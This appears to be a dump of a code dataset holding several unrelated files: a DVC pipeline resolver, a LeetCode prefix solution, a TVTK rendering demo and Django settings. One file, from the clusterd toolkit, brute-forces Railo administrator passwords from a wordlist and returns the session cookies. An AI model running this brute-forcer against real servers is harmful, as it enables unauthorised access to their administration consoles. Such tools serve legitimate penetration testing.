self.global_ctx.merge_update(vars_ctx)
self.data: dict = d
self.wdir = wdir
self.repo = repo
def _resolve_entry(self, name: str, definition):
context = Context.clone(self.global_ctx)
return self._resolve_stage(context, name, definition)
def resolve(self):
stages = self.data.get(STAGES_KWD, {})
data = join(starmap(self._resolve_entry, stages.items()))
logger.trace("Resolved dvc.yaml:\n%s", dumps_yaml(data))
return {STAGES_KWD: data}
def _resolve_stage(self, context: Context, name: str, definition) -> dict:
definition = deepcopy(definition)
wdir = self._resolve_wdir(context, definition.get(WDIR_KWD))
if self.wdir != wdir:
logger.debug(
"Stage %s has different wdir than dvc.yaml file", name
)
contexts = []
params_yaml_file = wdir / DEFAULT_PARAMS_FILE
if self.global_ctx_source != params_yaml_file:
if os.path.exists(params_yaml_file):
contexts.append(
Context.load_from(self.repo.tree, str(params_yaml_file))
)
else:
logger.debug(
"%s does not exist for stage %s", params_yaml_file, name
)
params_file = definition.get(PARAMS_KWD, [])
for item in params_file:
if item and isinstance(item, dict):
contexts.append(
Context.load_from(self.repo.tree, str(wdir / first(item)))
)
context.merge_update(*contexts)
logger.trace( # pytype: disable=attribute-error
"Context during resolution of stage %s:\n%s", name, context
)
with context.track():
stage_d = resolve(definition, context)
params = stage_d.get(PARAMS_KWD, []) + self._resolve_params(
context, wdir
)
if params:
stage_d[PARAMS_KWD] = params
return {name: stage_d}
def _resolve_params(self, context: Context, wdir):
tracked = defaultdict(set)
for src, keys in context.tracked.items():
tracked[str(PathInfo(src).relative_to(wdir))].update(keys)
return [{file: list(keys)} for file, keys in tracked.items()]
def _resolve_wdir(self, context: Context, wdir: str = None) -> PathInfo:
if not wdir:
return self.wdir
wdir = resolve(wdir, context)
return self.wdir / str(wdir)
| [
"[email protected]"
] | |
ac3f36b00c738fcffba08b38b22ace5d60c3a19f | 2656f92d8329bc1b28188802badc7b3a945fa978 | /src/platform/railo/authenticate.py | 8ee7b6a90b019f5aa138fc25923c9a2625b4583e | [
"MIT"
] | permissive | koutto/clusterd | 81828698574bc7301cd4eb0ad87d3115ddf74612 | 93db0a50210dcc6147c3122a539104a36e92f02b | refs/heads/master | 2020-05-03T17:51:55.430955 | 2019-03-31T23:20:22 | 2019-03-31T23:20:22 | 178,751,876 | 2 | 1 | MIT | 2019-03-31T23:04:14 | 2019-03-31T23:04:13 | null | UTF-8 | Python | false | false | 2,588 | py | from src.platform.railo.interfaces import RINTERFACES
from requests.utils import dict_from_cookiejar
from collections import OrderedDict
from sys import stdout
from log import LOG
import state
import utility
def _auth(pswd, url, title):
""" Support auth for both the web and server interfaces
"""
data = OrderedDict([
("lang", "en"),
("rememberMe", "yyyy"),
("submit", "submit")
])
if title is RINTERFACES.WEB:
data["login_passwordweb"] = pswd
elif title is RINTERFACES.SRV:
data['login_passwordserver'] = pswd
response = utility.requests_post(url, data=data)
if response.status_code is 200 and "login.login_password" not in response.content:
utility.Msg("Successfully authenticated with '%s'" % pswd, LOG.DEBUG)
return dict_from_cookiejar(response.cookies)
def checkAuth(ip, port, title):
""" Railo doesn't have usernames, so we only care about passwords
"""
url = None
if title is RINTERFACES.WEB:
url = "http://{0}:{1}/railo-context/admin/web.cfm".format(ip, port)
elif title is RINTERFACES.SRV:
url = "http://{0}:{1}/railo-context/admin/server.cfm".format(ip, port)
else:
utility.Msg("Interface %s not supported yet." % title, LOG.DEBUG)
return
if state.usr_auth:
# check with given auth; handle both cases of "default" and ":default"
if ':' in state.usr_auth:
(_, pswd) = state.usr_auth.split(":")
else:
pswd = state.usr_auth
return _auth(pswd, url, title)
if state.bf_wordlist and not state.hasbf:
state.hasbf = True
wordlist = []
with open(state.bf_wordlist, "r") as f:
wordlist = [x.decode("ascii", "ignore").rstrip() for x in f.readlines()]
utility.Msg("Brute forcing %s with %d passwords..." % (state.bf_user,
len(wordlist)), LOG.DEBUG)
try:
for (idx, word) in enumerate(wordlist):
stdout.flush()
stdout.write("\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m"
% (utility.timestamp(), state.bf_user, idx+1, len(wordlist)))
cook = _auth(word, url, title)
if cook:
print ''
utility.Msg("Successful login with %s" % word, LOG.SUCCESS)
return cook
print ''
except KeyboardInterrupt:
pass
| [
"[email protected]"
] | |
668781a6f78564088417314c29bba0050a82a1a5 | 8d55d3a52ed6dc8111801cea9c7c9d0a84be736b | /src/1392.longest-happy-prefix.py | 3b5ddbab31d9da69b9465e8818f5c3b68d1a952b | [] | no_license | mic0ud/Leetcode-py3 | 2a23270034ec470571e57c498830b93af813645f | 61fabda324338e907ce3514ae8931c013b8fe401 | refs/heads/master | 2022-12-26T11:52:31.666395 | 2020-09-27T19:27:10 | 2020-09-27T19:27:10 | 297,135,944 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,748 | py | #
# @lc app=leetcode id=1392 lang=python3
#
# [1392] Longest Happy Prefix
#
# https://leetcode.com/problems/longest-happy-prefix/description/
#
# algorithms
# Hard (39.14%)
# Likes: 191
# Dislikes: 15
# Total Accepted: 8K
# Total Submissions: 20.1K
# Testcase Example: '"level"'
#
# A string is called a happy prefix if is a non-empty prefix which is also a
# suffix (excluding itself).
#
# Given a string s. Return the longest happy prefix of s .
#
# Return an empty string if no such prefix exists.
#
#
# Example 1:
#
#
# Input: s = "level"
# Output: "l"
# Explanation: s contains 4 prefix excluding itself ("l", "le", "lev", "leve"),
# and suffix ("l", "el", "vel", "evel"). The largest prefix which is also
# suffix is given by "l".
#
#
# Example 2:
#
#
# Input: s = "ababab"
# Output: "abab"
# Explanation: "abab" is the largest prefix which is also suffix. They can
# overlap in the original string.
#
#
# Example 3:
#
#
# Input: s = "leetcodeleet"
# Output: "leet"
#
#
# Example 4:
#
#
# Input: s = "a"
# Output: ""
#
#
#
# Constraints:
#
#
# 1 <= s.length <= 10^5
# s contains only lowercase English letters.
#
#
#
# @lc code=start
class Solution:
def longestPrefix(self, s: str) -> str:
sp = self.suffix_prefix(s)
return s[:sp[-1]]
def suffix_prefix(self, s) -> [int]:
res, i = [0], 0
for j in range(1, len(s)):
while i > 0 and s[i] != s[j]:
i = res[i-1]
if s[i] == s[j]:
res.append(i+1)
i += 1
else:
res.append(0)
return res
# @lc code=end
if __name__ == '__main__':
s = Solution()
s.longestPrefix("levele")
s.longestPrefix("leetcodeleet")
| [
"[email protected]"
] | |
0b0904c3cb0fa4f9689e280d90bb751078b85fb6 | 3474b315da3cc5cb3f7823f19a18b63a8da6a526 | /scratch/KRAMS/src/apps/scratch/faezeh/lab/cell_lab/shell.py | 93472192968f601cf1db0bcfe727b1175ea20d64 | [] | no_license | h4ck3rm1k3/scratch | 8df97462f696bc2be00f1e58232e1cd915f0fafd | 0a114a41b0d1e9b2d68dbe7af7cf34db11512539 | refs/heads/master | 2021-01-21T15:31:38.718039 | 2013-09-19T10:48:24 | 2013-09-19T10:48:24 | 29,173,525 | 0 | 0 | null | 2015-01-13T04:58:57 | 2015-01-13T04:58:56 | null | UTF-8 | Python | false | false | 3,462 | py | '''
(C)2004 ORFEUS
This is the default python module file. It has been generated
by the modtree administrator
Import the generated Python module in order to
- initialize the required modules and
- load the compiled module extension library of this module
'''
# Here you can add your own code ...
#!/usr/bin/env python
"""A simple example demonstrating how one can use numpy arrays
transparently with TVTK.
"""
# Author: Prabhu Ramachandran and Eric Jones
# Copyright (c) 2004-2007, Enthought, Inc.
# License: BSD Style.
from enthought.tvtk.api import tvtk
from numpy import array
temperature = tvtk.DoubleArray()
temperature.insert_next_value(0.)
temperature.insert_next_value(20.)
temperature.insert_next_value(0.)
temperature.insert_next_value(0.)
temperature.insert_next_value(0.)
temperature.insert_next_value(0.)
temperature.insert_next_value(0.)
temperature.insert_next_value(0.)
#temp_array.append(temp2)
### TVTK PIPELINE
# create a render window and hand it the renderer
render_window = tvtk.RenderWindow(size=(400,400))
# create a renderer
renderer = tvtk.Renderer(background=(0.839216, 0.839216, 0.839216))
render_window.add_renderer(renderer)
# create interactor and hand it the render window
# This handles mouse interaction with window.
interactor = tvtk.RenderWindowInteractor(render_window=render_window)
points_arr = tvtk.Points()
#points_arr.insert_point(0, -1, -1, 0)
#points_arr.insert_point(1, 1, -1, 0)
#points_arr.insert_point(2, 1, 1, 0)
#points_arr.insert_point(3, -1, 1, 0)
#points_arr.insert_point(0, 0., 0., 0.)
#points_arr.insert_point(1, 0.5, 0., 1.)
#points_arr.insert_point(2, 1., 0., 0.)
#points_arr.insert_point(3, 1., 0.5, 0.)
#points_arr.insert_point(4, 1, 1., 0.)
#points_arr.insert_point(5, 0.5, 1, 1.)
#points_arr.insert_point(6, 0, 1., 0.)
#points_arr.insert_point(7, 0., 0.5, 0.)
points_arr.insert_point(0, 0., 0., 0.)
points_arr.insert_point(1, 1., 0., 0.)
points_arr.insert_point(2, 1., 1., 0.)
points_arr.insert_point(3, 0., 1., 0.)
points_arr.insert_point(4, 0.5, 0., 0.)
points_arr.insert_point(5, 1, 0.5, 0.)
points_arr.insert_point(6, 0.5, 1., 0.)
points_arr.insert_point(7, 0., 0.5, 0.)
#points_arr.insert_point(4, 1.5, 0., 0.)
#points_arr.insert_point(5, 2, 0.5, 0.)
#points_arr.insert_point(6, 1.5, 1., 0.)
#points_arr.insert_point(7, 1., 0.5, 0.)
quad = tvtk.QuadraticQuad()
quad._get_point_ids().set_id(0, 0)
quad._get_point_ids().set_id(1, 1)
quad._get_point_ids().set_id(2, 2)
quad._get_point_ids().set_id(3, 3)
quad._get_point_ids().set_id(4, 4)
quad._get_point_ids().set_id(5, 5)
quad._get_point_ids().set_id(6, 6)
quad._get_point_ids().set_id(7, 7)
#define array
polys = tvtk.CellArray()
#connect a cell to the array
polys.insert_next_cell(quad)
# Create a mesh from the data created above.
#mesh = tvtk.PolyData(points = points_arr,polys = polys)
mesh = tvtk.UnstructuredGrid()
mesh.insert_next_cell(quad.cell_type,quad._get_point_ids() )
mesh.points = points_arr
mesh.point_data.scalars = temperature
# Set the mapper to scale temperature range
# across the entire range of colors
#mapper = tvtk.PolyDataMapper(input=mesh)
mapper = tvtk.DataSetMapper(input=mesh)
# Create mesh actor for display
actor = tvtk.Actor(mapper=mapper)
actor.property.color=(1, 0, 0)
actor.property.point_size=(200.)
actor.property.line_width=(200.)
# Now add the actors to the renderer and start the interaction.
renderer.add_actor(actor)
interactor.initialize()
interactor.start()
| [
"Axel@Axel-Pc"
] | Axel@Axel-Pc |
70476e212daa4321863e86fabbc6752a86a59967 | d5219de4d3e4bef5c8c71e209158dd92d4f8a011 | /project/config/settings/common.py | a1d862bdb54494fd64d57ad3cdfcf6166a07ffa9 | [
"MIT"
] | permissive | ilmoeuro/asylum | 1932de32ae6db6b34d1609775d5ff9037130fe02 | 88d48d59cba58738bf141142bae7d1182cf4d5e7 | refs/heads/master | 2021-01-24T23:13:09.090463 | 2015-11-27T21:56:21 | 2015-11-27T21:56:21 | 47,000,716 | 1 | 0 | null | 2015-11-27T21:53:40 | 2015-11-27T21:53:40 | null | UTF-8 | Python | false | false | 8,123 | py | # -*- coding: utf-8 -*-
"""
Django settings for asylum project.
For more information on this file, see
https://docs.djangoproject.com/en/dev/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/dev/ref/settings/
"""
from __future__ import absolute_import, unicode_literals
import os.path
import environ
ROOT_DIR = environ.Path(__file__) - 3 # (/a/b/myfile.py - 3 = /)
APPS_DIR = ROOT_DIR.path('asylum')
env = environ.Env()
# If the project root contains a .env file, read it
if os.path.isfile(str(ROOT_DIR + '.env')):
environ.Env.read_env(str(ROOT_DIR + '.env'))
# APP CONFIGURATION
# ------------------------------------------------------------------------------
DJANGO_APPS = (
# Default Django apps:
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Useful template tags:
# 'django.contrib.humanize',
# Admin
'django.contrib.admin',
)
THIRD_PARTY_APPS = (
'crispy_forms', # Form layouts
)
# Apps specific for this project go here.
LOCAL_APPS = (
# Your stuff: custom apps go here
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps
INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS
# MIDDLEWARE CONFIGURATION
# ------------------------------------------------------------------------------
MIDDLEWARE_CLASSES = (
# Make sure djangosecure.middleware.SecurityMiddleware is listed first
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
# MIGRATIONS CONFIGURATION
# ------------------------------------------------------------------------------
MIGRATION_MODULES = {
'sites': 'asylum.contrib.sites.migrations'
}
# DEBUG
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = env.bool("DJANGO_DEBUG", False)
# FIXTURE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS
FIXTURE_DIRS = (
str(APPS_DIR.path('fixtures')),
)
# EMAIL CONFIGURATION
# ------------------------------------------------------------------------------
EMAIL_BACKEND = env('DJANGO_EMAIL_BACKEND', default='django.core.mail.backends.smtp.EmailBackend')
# MANAGER CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#admins
ADMINS = (
("""Anders Innovations""", '[email protected]'),
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#managers
MANAGERS = ADMINS
# DATABASE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases
DATABASES = {
# Raises ImproperlyConfigured exception if DATABASE_URL not in os.environ
'default': env.db("DATABASE_URL", default="postgres:///asylum"),
}
DATABASES['default']['ATOMIC_REQUESTS'] = True
# GENERAL CONFIGURATION
# ------------------------------------------------------------------------------
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'Europe/Helsinki'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code
LANGUAGE_CODE = 'fi-FI'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id
SITE_ID = 1
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n
USE_I18N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n
USE_L10N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz
USE_TZ = True
# TEMPLATE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#templates
_TEMPLATE_CONTEXT_PROCESSORS = [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.contrib.messages.context_processors.messages',
# Your stuff: custom template context processors go here
]
TEMPLATES = [
{
'BACKEND': "django_jinja.backend.Jinja2",
'APP_DIRS': False,
'DIRS': [
str(APPS_DIR.path('templates')),
],
'OPTIONS': {
'match_extension': '.jinja',
'context_processors': _TEMPLATE_CONTEXT_PROCESSORS,
'newstyle_gettext': True
}
},
{
# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-TEMPLATES-BACKEND
'BACKEND': 'django.template.backends.django.DjangoTemplates',
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs
'APP_DIRS': False,
'DIRS': [
str(APPS_DIR.path('templates')),
],
'OPTIONS': {
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug
'debug': DEBUG,
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-loaders
# https://docs.djangoproject.com/en/dev/ref/templates/api/#loader-types
'loaders': [
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
],
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors
'context_processors': _TEMPLATE_CONTEXT_PROCESSORS,
},
},
]
# See: http://django-crispy-forms.readthedocs.org/en/latest/install.html#template-packs
CRISPY_TEMPLATE_PACK = 'bootstrap3'
# STATIC FILE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root
STATIC_ROOT = str(ROOT_DIR('staticfiles'))
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = '/static/'
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS
STATICFILES_DIRS = (
str(APPS_DIR.path('static')),
)
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
# MEDIA CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root
MEDIA_ROOT = str(APPS_DIR('media'))
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url
MEDIA_URL = '/media/'
# URL Configuration
# ------------------------------------------------------------------------------
ROOT_URLCONF = 'config.urls'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application
WSGI_APPLICATION = 'config.wsgi.application'
# AUTHENTICATION CONFIGURATION
# ------------------------------------------------------------------------------
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
)
# SLUGLIFIER
AUTOSLUG_SLUGIFY_FUNCTION = 'slugify.slugify'
# Location of root django.contrib.admin URL, use {% url 'admin:index' %}
ADMIN_URL = r'^admin/'
# Your common stuff: Below this line define 3rd party library settings
| [
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.